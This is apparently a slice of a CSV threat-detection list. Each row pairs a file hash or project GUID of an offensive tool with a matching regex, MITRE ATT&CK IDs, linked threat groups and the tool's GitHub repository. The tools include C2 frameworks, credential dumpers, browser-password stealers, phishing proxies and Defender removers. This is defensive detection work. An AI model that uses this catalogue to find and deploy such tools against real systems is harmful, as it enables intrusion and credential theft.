"*4563bdbbc58eb60d27a45341223221e593db4873f378a3b018f86998187debe7*",".{0,1000}4563bdbbc58eb60d27a45341223221e593db4873f378a3b018f86998187debe7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25716"
"*4569687f2dd096f8559b0b2a3710ffe1f6a7374f6439e2d8559a29f33289ef62*",".{0,1000}4569687f2dd096f8559b0b2a3710ffe1f6a7374f6439e2d8559a29f33289ef62.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25717"
"*456a99ccb18c638425add933b1ae1fcef59cb064aa97dc0be231d16c35bddff0*",".{0,1000}456a99ccb18c638425add933b1ae1fcef59cb064aa97dc0be231d16c35bddff0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25718"
"*457026969789119712188521674e7eb3a1cb4ab5e121b6ba80515090eea71d27*",".{0,1000}457026969789119712188521674e7eb3a1cb4ab5e121b6ba80515090eea71d27.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","25719"
"*457357c2ae6877a930e6d7e13fab96a5f45465bc8b0d8af41663d31c27943fbe*",".{0,1000}457357c2ae6877a930e6d7e13fab96a5f45465bc8b0d8af41663d31c27943fbe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25721"
"*45787955618ba3211b89021ddf23ecc5d2b55397a006190455c4070dad964572*",".{0,1000}45787955618ba3211b89021ddf23ecc5d2b55397a006190455c4070dad964572.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","#filehash","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","25723"
"*45793979bc26536a779c1975d9adb745944894941760f1a73f5127e964853c3c*",".{0,1000}45793979bc26536a779c1975d9adb745944894941760f1a73f5127e964853c3c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25724"
"*457cd41fbb528812aa51bc4b31fce042cdf736281b162181d91c47733d0e9e4b*",".{0,1000}457cd41fbb528812aa51bc4b31fce042cdf736281b162181d91c47733d0e9e4b.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","25725"
"*4581d0993624a9dab870f29d66f0acb39db89b818de62d8f345de3155340066f*",".{0,1000}4581d0993624a9dab870f29d66f0acb39db89b818de62d8f345de3155340066f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25726"
"*4586fbacf5d78e868b9b823f3109d05f73bc30cc111d1af34db3e0bb54655dc2*",".{0,1000}4586fbacf5d78e868b9b823f3109d05f73bc30cc111d1af34db3e0bb54655dc2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25729"
"*4592e0848e4929ac2b6ba4593f8cbfe09f52ce6ca4206ce52087a31073903645*",".{0,1000}4592e0848e4929ac2b6ba4593f8cbfe09f52ce6ca4206ce52087a31073903645.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","0","#filehash","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","25730"
"*4593dbaecd6d4e05d7aa7e2cb8cc8ce4b9d1ccc1a6b26e40fdf72fd8a80e7d07*",".{0,1000}4593dbaecd6d4e05d7aa7e2cb8cc8ce4b9d1ccc1a6b26e40fdf72fd8a80e7d07.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25731"
"*4595ba305652431a89d142e09e6e5a9e67515bec0864017e8331082d3004611f*",".{0,1000}4595ba305652431a89d142e09e6e5a9e67515bec0864017e8331082d3004611f.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","25732"
"*459a943f33a20359d1f2dd896ad3ad7c5eb791582c124e851dd2dca6f2088051*",".{0,1000}459a943f33a20359d1f2dd896ad3ad7c5eb791582c124e851dd2dca6f2088051.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25733"
"*45a2c28d5ee54ff89dcdb82fd23110e353a740277ec8d6ae0683a111877324cf*",".{0,1000}45a2c28d5ee54ff89dcdb82fd23110e353a740277ec8d6ae0683a111877324cf.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25735"
"*45a81bd15482f0fa6be511d3590b8c8d550e80362b5dfe10edc2488043c48cbc*",".{0,1000}45a81bd15482f0fa6be511d3590b8c8d550e80362b5dfe10edc2488043c48cbc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25736"
"*45a8664a10f0b5f30e458aed00e46378dae5e8b3e6e208394a83e1d080b8a978*",".{0,1000}45a8664a10f0b5f30e458aed00e46378dae5e8b3e6e208394a83e1d080b8a978.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25737"
"*45ac6b7f8086f9f50624985e018dc4869cf5a4bb9c831d76cc0d1eeb1baf2105*",".{0,1000}45ac6b7f8086f9f50624985e018dc4869cf5a4bb9c831d76cc0d1eeb1baf2105.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","25739"
"*45adfa7ad271498293d298a774c19e47c94046648c680343b47361fc64bb1fa3*",".{0,1000}45adfa7ad271498293d298a774c19e47c94046648c680343b47361fc64bb1fa3.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","25740"
"*45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace*",".{0,1000}45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","25742"
"*45cc6eff2c3a6facb1aa9e31f2ce7d45d7b5527633c54d9deb5de1f19ffc906d*",".{0,1000}45cc6eff2c3a6facb1aa9e31f2ce7d45d7b5527633c54d9deb5de1f19ffc906d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25743"
"*45D59D79-EF51-4A93-AAFA-2879FFC3A62C*",".{0,1000}45D59D79\-EF51\-4A93\-AAFA\-2879FFC3A62C.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#GUIDproject","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","25744"
"*45d8e1aafeb7361581def6751c201b11cd2a9761f1c19d17925f72fda78328bc*",".{0,1000}45d8e1aafeb7361581def6751c201b11cd2a9761f1c19d17925f72fda78328bc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25746"
"*45e1b189f8a3f50c1c1b88dd8cc05e915cad79e9ff98ef589a42e72cbe07aae3*",".{0,1000}45e1b189f8a3f50c1c1b88dd8cc05e915cad79e9ff98ef589a42e72cbe07aae3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25747"
"*45ea038d3721285f2759d8c8f3740cbb9cb9400a0cf76d11d84e089bd99ed1a9*",".{0,1000}45ea038d3721285f2759d8c8f3740cbb9cb9400a0cf76d11d84e089bd99ed1a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25748"
"*45ebedf8240705e9da3b89591d6e0203764e94a1ba5ebaf999627012e06bebd3*",".{0,1000}45ebedf8240705e9da3b89591d6e0203764e94a1ba5ebaf999627012e06bebd3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25749"
"*45fd8c64f22872051c84e5c5fe48749ee7ada07a51a1b263dc75c6ccd2567922*",".{0,1000}45fd8c64f22872051c84e5c5fe48749ee7ada07a51a1b263dc75c6ccd2567922.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","25753"
"*45ff440d387c984f8bd7be1d1bc77cd9eaf70aa513a2a4c80189294a0f70c411*",".{0,1000}45ff440d387c984f8bd7be1d1bc77cd9eaf70aa513a2a4c80189294a0f70c411.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","25754"
"*4602cabfd4c313a8f51dfee4f0fdd32b5a97d5913945ca8a3e267a01d4f167de*",".{0,1000}4602cabfd4c313a8f51dfee4f0fdd32b5a97d5913945ca8a3e267a01d4f167de.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25756"
"*461356f9bd764b57b3b9a1457aa60494ae73a7935133f5b6122edcb286b7ef0a*",".{0,1000}461356f9bd764b57b3b9a1457aa60494ae73a7935133f5b6122edcb286b7ef0a.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","#filehash","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","25758"
"*4614a6da343623fc820d89d35b8c2a26fe69abf357af7ef7602e52808fbe8611*",".{0,1000}4614a6da343623fc820d89d35b8c2a26fe69abf357af7ef7602e52808fbe8611.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","25760"
"*461df8ad66af0d6635bc8e389f307569c01f1b589319b8a887578b221c943b03*",".{0,1000}461df8ad66af0d6635bc8e389f307569c01f1b589319b8a887578b221c943b03.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#filehash","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","25763"
"*461F72D2-6BDC-4D0E-82EE-59A811AB4844*",".{0,1000}461F72D2\-6BDC\-4D0E\-82EE\-59A811AB4844.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#GUIDproject","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","25764"
"*4621d400f556301fd9ba40c1325a65727b4eb564eeda5fb0368f547eec603ff3*",".{0,1000}4621d400f556301fd9ba40c1325a65727b4eb564eeda5fb0368f547eec603ff3.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","25765"
"*46281222e0c038fb6b34921405aa98b5adc07d97f0074e1eb9488cab9b6b7778*",".{0,1000}46281222e0c038fb6b34921405aa98b5adc07d97f0074e1eb9488cab9b6b7778.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25767"
"*4628fdac0a217dd268e3f962a7665348eb9cf64bda81313cbfb1617008a9dc2e*",".{0,1000}4628fdac0a217dd268e3f962a7665348eb9cf64bda81313cbfb1617008a9dc2e.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","25768"
"*462f4b3e28c75c1b61770cf570c1650be5142a10efd9af8a7f15ada70cb061cf*",".{0,1000}462f4b3e28c75c1b61770cf570c1650be5142a10efd9af8a7f15ada70cb061cf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25769"
"*463183549b3e427b66613231ef130febb24b0c555747528075e1168fc627765f*",".{0,1000}463183549b3e427b66613231ef130febb24b0c555747528075e1168fc627765f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25771"
"*463dd406d25b3d6a4198ff373a8f236333c83f10fe9cff6791f2fbc210a73ad7*",".{0,1000}463dd406d25b3d6a4198ff373a8f236333c83f10fe9cff6791f2fbc210a73ad7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25772"
"*464b89245a6eb6429d6588c6f9b15e5a158e41be1f7ae9ccb6e3b3ba0ca6106d*",".{0,1000}464b89245a6eb6429d6588c6f9b15e5a158e41be1f7ae9ccb6e3b3ba0ca6106d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25773"
"*4658ae8a4a3005961327d9b009027b5fdb9e847dc055e4f303ea977639662ca7*",".{0,1000}4658ae8a4a3005961327d9b009027b5fdb9e847dc055e4f303ea977639662ca7.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25776"
"*465a40473aa4e631668c9d2a28bf7d3821bc124527c873511563eb53d3829e09*",".{0,1000}465a40473aa4e631668c9d2a28bf7d3821bc124527c873511563eb53d3829e09.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25777"
"*465a8ba788d324313ccf9d344f35ce5d1d4153d0367c6f647bfa817be18934ce*",".{0,1000}465a8ba788d324313ccf9d344f35ce5d1d4153d0367c6f647bfa817be18934ce.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#filehash","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","25778"
"*4665bf3f84b00ec83f005ea4feb3617acf032a69826013656a04683865c204f6*",".{0,1000}4665bf3f84b00ec83f005ea4feb3617acf032a69826013656a04683865c204f6.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","25779"
"*4672ac01c62257129756f1d9f0ae1fd2471de6f78e47fa906af47e22204d917b*",".{0,1000}4672ac01c62257129756f1d9f0ae1fd2471de6f78e47fa906af47e22204d917b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25786"
"*46793c55c24e616a0d4eaaa0090b70bdde05e50c1b58da753d09063e6e838cc6*",".{0,1000}46793c55c24e616a0d4eaaa0090b70bdde05e50c1b58da753d09063e6e838cc6.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","25787"
